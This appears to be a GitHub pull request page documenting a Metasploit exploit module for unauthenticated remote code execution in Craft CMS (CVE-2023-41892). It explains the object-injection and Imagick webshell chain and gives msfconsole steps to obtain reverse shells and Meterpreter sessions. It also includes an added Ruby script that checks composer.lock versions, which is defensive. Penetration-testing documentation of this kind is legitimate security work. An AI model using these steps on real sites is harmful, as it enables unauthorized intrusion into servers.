Craft CMS unauthenticated RCE [CVE-2023-41892] #18612
Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
Thanks @h00die-gr3y for updating this. I just left a few last comments and questions before it lands. I tested against CraftCMS version 4.4.14 and it works great.
Thanks for updating this @h00die-gr3y ! Everything looks good to me now. I tested against CraftCMS version 4.4.14 and verified I got a session with all the targets. I'll go ahead and land it.
Release notes
This adds an exploit module that leverages a remote code execution vulnerability in CraftCMS versions between 4.0.0-RC1 and 4.4.14. This vulnerability is identified as CVE-2023-41892 and allows an unauthenticated attacker to execute arbitrary code remotely.
This module exploits a Remote Code Execution vulnerability (CVE-2023-41892) in CraftCMS, which is a popular content management system. CraftCMS versions between 4.0.0-RC1 and 4.4.14 are affected by this vulnerability, allowing attackers to execute arbitrary code remotely and potentially compromising the security and integrity of the application.

The vulnerability occurs through PHP object creation in the \craft\controllers\ConditionsController class, which allows running arbitrary PHP code by escalating the object creation to call some methods available in \GuzzleHttp\Psr7\FnStream. Using this vulnerability in combination with the Imagick extension and MSL, which stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that facilitates the reading of images, the performance of image processing tasks, and the writing of results back to the filesystem. This can be leveraged to create a dummy image containing malicious PHP code using the Imagick constructor class, delivering a webshell that can be accessed by the attacker, thereby executing the malicious PHP code and gaining access to the system. For more information, please check this article on attackerkb.com.

Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain access to the underlying operating system as the user that the web services are running as (typically www-data).

Installation
To test this module, you will need a vulnerable CraftCMS application. This module has been tested on CraftCMS 4.4.14 running on MacOS Docker Desktop based on a DDEV deployment.

Installation steps to install CraftCMS on MacOS using Docker Desktop and DDEV:
1. Install Docker Desktop on your MacOS distribution.
2. Install DDEV.
3. Install CraftCMS following these installation steps.
   NOTE: After step 2, "Scaffold the project from the official starter project", open composer.json to edit the CraftCMS version and set it to 4.4.14 or lower. Run composer update to downgrade the CraftCMS version to a vulnerable version. See also these instructions. Continue with step 3 and, after completion, you should be able to access your application using your site name (https://mysite.ddev.site).
4. To access your application from another host, you need to set up a tunnel, otherwise you can only access it from the local machine. You can follow these instructions.
5. You are now ready to test the module.
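The affected range stated above (4.0.0-RC1 through 4.4.14) is what a defender needs to triage an installation. The following is an added example, not part of this PR or of the Metasploit module: it reads the pinned craftcms/cms version from a composer.lock document (the lock file below is constructed, and the package name craftcms/cms is an assumption about how Craft is installed via Composer) and reports whether it falls inside the affected range.

```ruby
require 'json'
require 'rubygems'

# Affected range as stated in the module description: 4.0.0-RC1 through 4.4.14.
# Gem::Version rewrites "4.0.0-RC1" as the prerelease "4.0.0.pre.RC1", so it sorts
# below 4.0.0 and above 3.x. Earlier pre-RC labels of 4.0.0 are not modelled here
# because the advisory range on this page starts at RC1.
AFFECTED_MIN = Gem::Version.new('4.0.0-RC1')
AFFECTED_MAX = Gem::Version.new('4.4.14')

# Constructed sample composer.lock, trimmed to the fields this check needs.
SAMPLE_LOCK = <<~JSON
  {
    "packages": [
      { "name": "craftcms/cms", "version": "4.4.14" },
      { "name": "guzzlehttp/psr7", "version": "2.6.0" }
    ]
  }
JSON

# Return the pinned craftcms/cms version from a composer.lock document, or nil
# when the package is not present. Assumption: Craft CMS is installed via the
# Composer package "craftcms/cms". A leading "v" is stripped if present.
def craft_version_from_lock(lock_json)
  pkg = JSON.parse(lock_json).fetch('packages', []).find { |p| p['name'] == 'craftcms/cms' }
  pkg&.dig('version')&.sub(/\Av/, '')
end

# True when the version lies inside the affected range (inclusive on both ends),
# false when outside it, nil when the version is missing or malformed so that an
# unparsable value is never silently reported as safe.
def affected?(version)
  return nil if version.nil?
  v = Gem::Version.new(version)
  v >= AFFECTED_MIN && v <= AFFECTED_MAX
rescue ArgumentError
  nil
end

if __FILE__ == $PROGRAM_NAME
  lock = ARGV[0] ? File.read(ARGV[0]) : SAMPLE_LOCK
  v = craft_version_from_lock(lock)
  verdict = { true => 'inside the CVE-2023-41892 affected range',
              false => 'outside the affected range',
              nil => 'version missing or unparsable' }[affected?(v)]
  puts "craftcms/cms #{v.inspect}: #{verdict}"
end
```

Run it with the path to a deployment's composer.lock as the first argument; without an argument it checks the constructed sample.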
Verification Steps
1. msfconsole
2. use exploit/linux/http/craftcms_unauth_rce_cve_2023_41892
3. set rhosts <ip-target>
4. set rport 443
5. set lhost <ip-attacker>
6. set target <0=php, 1=Unix Command, 2=Linux Dropper>
7. exploit
8. You should get a shell or Meterpreter session.
Options
WEBSHELL
You can use this option to set the filename of the webshell, with the extension .php; otherwise the name will be randomly generated.

COMMAND
This option lets the user choose the underlying PHP shell command function used for execution. The choices are system(), passthru(), shell_exec() and exec(), and it defaults to passthru(). This option is only available when the selected target is either Unix Command or Linux Dropper. For the native PHP target, the eval() function is used by default for native PHP code execution.

Scenarios
CraftCMS 4.4.14 on MacOS PHP - php/meterpreter/reverse_tcp
CraftCMS 4.4.14 on MacOS Unix Command - cmd/unix/reverse_bash
CraftCMS 4.4.14 on MacOS Linux Dropper - linux/x64/meterpreter/reverse_tcp
Limitations
Part of the exploit is the MSL script creation triggered by the Imagick plugin module. These files are created in the directory set by the upload_tmp_dir setting in the php.ini file (default /tmp). These files are automatically cleaned, but in case of any failure, clean them manually, otherwise the next exploit session will fail by using an outdated MSL file. These files start with php and you can list them with the command ls php*.